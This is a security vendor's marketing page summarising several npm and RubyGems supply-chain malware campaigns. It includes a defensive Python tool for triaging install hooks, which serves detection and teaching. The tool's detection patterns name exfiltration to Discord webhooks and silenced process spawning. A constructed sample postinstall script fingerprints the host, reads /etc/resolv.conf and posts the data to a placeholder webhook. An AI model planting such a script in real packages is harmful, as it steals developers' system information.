The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love →
Book a Demo · Read the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: a preinstall script (setup_bun.js) and loader (setup_bin.js) that install or locate Bun and then execute an obfuscated, bundled malicious script (bun_environment.js) with output suppressed.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published from new accounts, roughly one every two minutes. The packages contain simple malware variants and are being removed by npm almost as fast as they appear. At least 420 unique packages have been identified; their own descriptions often state that they are generated every two minutes, and some mention a capture-the-flag challenge or a test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain campaign leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated the data as a JSON blob to a hardcoded Discord webhook.
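Offline triage of npm install-time hooks, added as an example for two of the campaigns above (the Shai Hulud v2 preinstall loader run with suppressed output, and the postinstall fingerprint-and-exfiltrate packages); it is not Socket's scanner and not code from either campaign. It assumes the package tarball has been unpacked and its files read into a dict keyed by path; the indicator regexes, the sample package.json and the sample install script are all constructed for the example.

```python
"""Triage of npm install-time lifecycle hooks, offline, against a package's own files.

Added example: not Socket's scanner and not code from any campaign. It reads
package.json plus the script each install hook points at and flags the
indicators the campaigns combined: a hook that runs at install, host
fingerprinting, process spawning, silenced output and an outbound webhook.
"""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator set; tune and extend it for your own corpus.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://"),
    "process_spawn": re.compile(r"child_process|execSync|spawnSync|\bspawn\("),
    "host_fingerprint": re.compile(
        r"os\.hostname|os\.userInfo|networkInterfaces|process\.env\.(HOME|USER)"),
    "webhook_exfil": re.compile(r"discord(app)?\.com/api/webhooks"),
    "silenced_output": re.compile(r"stdio:\s*['\"]ignore['\"]|>\s*/dev/null|2>&1"),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
}

_NODE_SCRIPT = re.compile(r"\bnode\s+([\w./-]+\.js)")  # "node setup_x.js" -> setup_x.js


def _indicators(text: str) -> list:
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def triage_package(package_json: str, files: dict) -> list:
    """One finding per install hook; indicators cover the command and the script it runs."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        text, script_file = command, None
        m = _NODE_SCRIPT.search(command)
        if m and m.group(1) in files:
            script_file = m.group(1)
            text += "\n" + files[script_file]  # scan the loader the hook invokes, too
        findings.append({"hook": hook, "command": command,
                         "script_file": script_file, "indicators": _indicators(text)})
    return findings


# Constructed sample mirroring the postinstall fingerprint-and-exfiltrate pattern.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-stats-helper",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup_env.js > /dev/null 2>&1", "test": "jest"},
})
SAMPLE_FILES = {
    "setup_env.js": (
        "const os = require('os');\n"
        "const { execSync } = require('child_process');\n"
        "const info = {\n"
        "  host: os.hostname(), user: os.userInfo().username, cwd: process.cwd(),\n"
        "  dns: execSync('cat /etc/resolv.conf').toString(),\n"
        "  pkg: require('./package.json').name,\n"
        "};\n"
        "const req = require('https').request(\n"
        "  'https://discord.com/api/webhooks/<id>/<token>', { method: 'POST' });\n"
        "req.end(JSON.stringify(info));\n"
    ),
}
# Constructed benign control: a native addon with an ordinary install hook.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "native-addon",
    "scripts": {"install": "node-gyp rebuild", "test": "mocha"},
})


if __name__ == "__main__":
    for finding in triage_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(f"{finding['hook']}: {finding['command']}")
        print(f"  script: {finding['script_file']}  indicators: {finding['indicators']}")
```

A hook with no indicators is still worth a look (native addons legitimately use install hooks, but so did the Shai Hulud loader before it fetched Bun); the point of the indicator list is to rank, not to clear. Installing with `--ignore-scripts` while the triage runs keeps the hooks from firing on the analyst's machine.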

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub App · Book a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles →